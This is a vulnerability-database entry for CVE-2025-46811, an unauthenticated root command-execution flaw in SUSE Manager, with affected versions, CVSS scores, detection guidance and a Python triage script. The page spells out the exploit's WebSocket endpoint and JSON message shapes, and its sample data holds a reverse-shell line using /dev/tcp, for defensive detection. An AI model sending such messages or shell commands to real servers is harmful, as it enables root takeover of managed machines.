CVE-2025-46811
published 2025-07-30

CVE-2025-46811: A Missing Authorization vulnerability in SUSE Linux Manager allows anyone with the ability to connect to port 443 of SUSE Manager to run any command as…

Priority P276 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 10.35% (95.1th percentile)
A Missing Authorization vulnerability in SUSE Linux Manager allows anyone with the ability to connect to port 443 of SUSE Manager to run any command as root on any client. This issue affects Container suse/manager/5.0/x86_64/server:5.0.5.7.30.1: from ? before 5.0.27-150600.3.33.1; Image SLES15-SP4-Manager-Server-4-3-BYOS: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server-4-3-BYOS-Azure: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server-4-3-BYOS-EC2: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server-4-3-BYOS-GCE: from ? before 4.3.87-150400.3.110.2; SUSE Manager Server Module 4.3: from ? before 4.3.87-150400.3.110.2.

Affected

10 ranges
Vendor | Product | Version range | Fixed in
msrc | azl3_kernel_6.6.47.1-1_on_azure_linux_3.0 | |
msrc | azl3_kernel_6.6.51.1-5_on_azure_linux_3.0 | |
msrc | azure_linux_3.0_arm | |
msrc | azure_linux_3.0_x64 | |
suse | container_suse_manager_5.0_x86_64_server_5.0.5.7.30.1 | >= ? < 5.0.27-150600.3.33.1 | 5.0.27-150600.3.33.1
suse | image_sles15-sp4-manager-server-4-3-byos | >= ? < 4.3.87-150400.3.110.2 | 4.3.87-150400.3.110.2
suse | image_sles15-sp4-manager-server-4-3-byos-azure | >= ? < 4.3.87-150400.3.110.2 | 4.3.87-150400.3.110.2
suse | image_sles15-sp4-manager-server-4-3-byos-ec2 | >= ? < 4.3.87-150400.3.110.2 | 4.3.87-150400.3.110.2
suse | image_sles15-sp4-manager-server-4-3-byos-gce | >= ? < 4.3.87-150400.3.110.2 | 4.3.87-150400.3.110.2
suse | suse_manager_server_module_4.3 | >= ? < 4.3.87-150400.3.110.2 | 4.3.87-150400.3.110.2

Detection & IOCs (extracted from sources)

url: /rhn/websocket/minion/remote-commands
port: 443
other: {"preview": true, "target": "*"}
other: {"preview": false, "target": "<minion>", "command": "<payload>"}
  • Monitor for unauthenticated WebSocket connections to /rhn/websocket/minion/remote-commands on port 443; any connection from an unexpected source without a valid session should be treated as exploitation of CVE-2025-46811.
  • Detect WebSocket messages containing JSON keys 'preview' and 'target' with wildcard value '*' as the initial reconnaissance phase of the exploit (minion enumeration).
  • Detect WebSocket messages containing JSON keys 'preview': false, 'target', and 'command' as the payload delivery phase; the 'command' field will contain the attacker's shell command (e.g., reverse shell via /dev/tcp).
  • Alert on reverse shell patterns in process execution on SUSE Manager clients, specifically 'sh -i' combined with /dev/tcp redirections, as these indicate successful exploitation resulting in root command execution.
  • The exploit uses the Python websocket-client library; network signatures should look for WebSocket upgrade requests to /rhn/websocket/minion/remote-commands without a corresponding authenticated session cookie.
  • The vulnerability affects SUSE Manager 4.3.x and 5.0.x as well as Uyuni 2025.05; patched versions are 4.3.87-150400.3.110.2 and 5.0.27-150600.3.33.1 respectively. Ensure patched versions are deployed before relying solely on detection.
  • The exploit supports both SSL (wss://) and plaintext (ws://) WebSocket connections; detection rules must cover both schemes on port 443 and any non-standard ports.
  • The exploit retries up to 4 times with 15-second delays between attempts; rate-based detection thresholds should account for this slow-retry pattern to avoid missing low-and-slow exploitation.
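
The detection bullets above, combined into one triage pass (an added example, not code from this page or from SUSE). It assumes a sensor or reverse proxy already emits one record per WebSocket connection; the record fields (src, port, path, has_session, frames) and all sample values are constructed for illustration.

```python
import json
import re

ENDPOINT = "/rhn/websocket/minion/remote-commands"  # path listed on this page
# 'sh -i' together with a /dev/tcp redirection, in either order
REVERSE_SHELL = re.compile(r"\bsh\s+-i\b.*/dev/tcp/|/dev/tcp/.*\bsh\s+-i\b", re.S)

def classify_frame(raw):
    """Return the phase a WebSocket text frame matches, or None."""
    try:
        msg = json.loads(raw)
    except (TypeError, ValueError):
        return None  # not JSON: outside this rule
    if not isinstance(msg, dict) or "preview" not in msg or "target" not in msg:
        return None
    if msg["preview"] is True and msg["target"] == "*":
        return "enumeration"
    if msg["preview"] is False and "command" in msg:
        shell = REVERSE_SHELL.search(str(msg["command"]))
        return "payload+reverse-shell" if shell else "payload"
    return None

def triage(events):
    """Flag connections to ENDPOINT that carried no authenticated session."""
    findings = []
    for ev in events:
        # Match on path only, so ws:// and wss:// on any port are covered.
        if ev["path"].split("?", 1)[0] != ENDPOINT or ev["has_session"]:
            continue
        phases = [p for p in map(classify_frame, ev["frames"]) if p]
        findings.append({"src": ev["src"], "port": ev["port"], "phases": phases})
    return findings

# Constructed sample events (not real traffic). 'has_session' is a hypothetical
# sensor field: True if the upgrade request carried a valid session cookie.
SAMPLE_EVENTS = [
    {"src": "192.0.2.10", "port": 443, "path": ENDPOINT, "has_session": False,
     "frames": ['{"preview": true, "target": "*"}',
                '{"preview": false, "target": "minion-a", '
                '"command": "sh -i >& /dev/tcp/<host>/<port> 0>&1"}']},
    {"src": "198.51.100.7", "port": 443, "path": ENDPOINT, "has_session": True,
     "frames": ['{"preview": true, "target": "*"}']},
    {"src": "192.0.2.44", "port": 8080, "path": ENDPOINT + "?x=1",
     "has_session": False, "frames": ["not json"]},
    {"src": "192.0.2.50", "port": 443, "path": "/rhn/other",
     "has_session": False, "frames": []},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

An unauthenticated connection is reported even when no frame matches, since the first bullet treats the connection itself as the signal; the phases list only adds context for the analyst.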

CVSS provenance

nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v4.0 | 9.3 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vendor_msrc | 7.8 | HIGH